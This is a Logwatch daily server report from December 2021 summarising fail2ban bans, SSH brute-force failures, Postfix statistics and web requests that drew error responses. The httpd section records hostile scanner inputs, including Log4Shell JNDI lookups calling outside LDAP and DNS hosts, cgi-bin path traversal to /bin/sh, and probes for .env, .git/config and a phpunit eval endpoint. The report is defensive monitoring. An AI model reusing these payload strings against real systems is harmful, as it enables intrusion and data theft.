################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Tue Dec 14 04:42:04 2021
Date Range Processed: yesterday
( 2021-Dec-13 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 23:23 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
112.94.253.176 -> zapf.wiki:443: 1 Time(s)
223.167.74.215 -> zapf.wiki:443: 1 Time(s)
45.81.235.112 -> 45.81.235.214:4444: 9 Time(s)
60.191.125.35 -> zapf.wiki:443: 1 Time(s)
A total of 3 sites probed the server
159.65.36.205
61.219.11.151
66.240.205.34
Requests with error response codes
400 Bad Request
45.81.235.214:4444: 9 Time(s)
null: 4 Time(s)
zapf.wiki:443: 3 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 2 Time(s)
/config/getuser?index=0: 2 Time(s)
/w00tw00t.at.ISC.SANS.DFind:): 2 Time(s)
mstshash=Administr: 2 Time(s)
mstshash=Domain: 2 Time(s)
/: 1 Time(s)
/.git/config: 1 Time(s)
/aaa9: 1 Time(s)
/aab9: 1 Time(s)
/ab2g: 1 Time(s)
/ab2h: 1 Time(s)
/cgi-bin/.%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/bin/bash: 1 Time(s)
404 Not Found
/berlin/apple-touch-icon.png: 1 Time(s)
500 Internal Server Error
/: 22 Time(s)
/robots.txt: 4 Time(s)
/$%7Bjndi:dns://45.83.64.1/securityscan-https443%7D: 2 Time(s)
/.env: 2 Time(s)
//QeeB: 2 Time(s)
/$%7Bjndi:ldap://45.83.193.150:1389/Exploit%7D: 1 Time(s)
/.git/config: 1 Time(s)
/Autodiscover/Autodiscover.xml: 1 Time(s)
/_ignition/execute-solution: 1 Time(s)
/_profiler/phpinfo: 1 Time(s)
/aaa9: 1 Time(s)
/aab9: 1 Time(s)
/actuator/health: 1 Time(s)
/bag2: 1 Time(s)
/console/: 1 Time(s)
/debug/default/view?panel=config: 1 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 1 Time(s)
/index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s)
/mifs/.;/services/LogService: 1 Time(s)
/owa/auth/logon.aspx: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
/owa/auth/x.js: 1 Time(s)
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
root (121.4.179.91): 38 Time(s)
root (106.12.86.8): 37 Time(s)
root (168.194.162.142): 37 Time(s)
root (167.71.233.95): 35 Time(s)
root (139.59.228.214): 33 Time(s)
root (203.176.78.120): 33 Time(s)
root (119.82.135.226): 30 Time(s)
root (139.155.35.47): 25 Time(s)
root (49.232.138.121): 21 Time(s)
root (143.110.212.213): 19 Time(s)
unknown (139.155.35.47): 17 Time(s)
unknown (139.59.228.214): 17 Time(s)
root (124.152.213.64): 16 Time(s)
unknown (167.71.233.95): 15 Time(s)
unknown (203.176.78.120): 15 Time(s)
unknown (106.12.86.8): 13 Time(s)
unknown (168.194.162.142): 13 Time(s)
unknown (119.82.135.226): 11 Time(s)
unknown (143.110.212.213): 11 Time(s)
unknown (124.152.213.64): 9 Time(s)
unknown (49.232.138.121): 9 Time(s)
unknown (121.4.179.91): 7 Time(s)
unknown (193.169.254.138): 2 Time(s)
unknown (221.147.61.84): 2 Time(s)
root (1.37.33.24): 1 Time(s)
root (164.90.203.55): 1 Time(s)
root (167.71.10.210): 1 Time(s)
root (180.254.73.75): 1 Time(s)
root (193.169.254.138): 1 Time(s)
root (223.99.170.130): 1 Time(s)
unknown (211.76.125.186): 1 Time(s)
unknown (45.141.84.10): 1 Time(s)
unknown (synprobe001.leakix.net): 1 Time(s)
unknown (vmi744046.contaboserver.net): 1 Time(s)
Invalid Users:
Unknown Account: 145 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
6 Miscellaneous warnings
8.927K Bytes accepted 9,141
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
1 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
1 Total 4xx Rejects 100.00%
======== ==================================================
17 Connections
9 Connections lost (inbound)
17 Disconnections
1 Removed from queue
1 Sent via SMTP
1 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Failed logins from:
1.37.33.24: 1 time
49.232.138.121: 21 times
106.12.86.8: 37 times
119.82.135.226 (static.cmcti.vn): 30 times
121.4.179.91: 38 times
124.152.213.64: 16 times
139.59.228.214: 33 times
139.155.35.47: 25 times
143.110.212.213: 19 times
164.90.203.55: 1 time
167.71.10.210: 1 time
167.71.233.95: 35 times
168.194.162.142 (142.162.194.168.rfc6598.dynamic.copelfibra.com.br): 37 times
180.254.73.75: 1 time
193.169.254.138: 1 time
203.176.78.120: 33 times
223.99.170.130: 1 time
Illegal users from:
2001:470:1:c84::20: 1 time
undef: 109 times
45.88.188.13 (vmi744046.contaboserver.net): 1 time
45.141.84.10: 1 time
49.232.138.121: 9 times
65.49.20.66 (scan-17.shadowserver.org): 1 time
106.12.86.8: 13 times
119.82.135.226 (static.cmcti.vn): 11 times
121.4.179.91: 7 times
124.152.213.64: 9 times
139.59.228.214: 17 times
139.155.35.47: 17 times
143.110.212.213: 11 times
167.71.13.196 (synprobe001.leakix.net): 1 time
167.71.233.95: 15 times
168.194.162.142 (142.162.194.168.rfc6598.dynamic.copelfibra.com.br): 13 times
193.169.254.138: 2 times
203.176.78.120: 15 times
211.76.125.186 (211-76-125-186.static.kbronet.com.tw): 1 time
221.147.61.84: 2 times
**Unmatched Entries**
Disconnecting: Change of username or service not allowed: (admin,ssh-connection) -> (0,ssh-connection) [preauth] : 1 time(s)
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################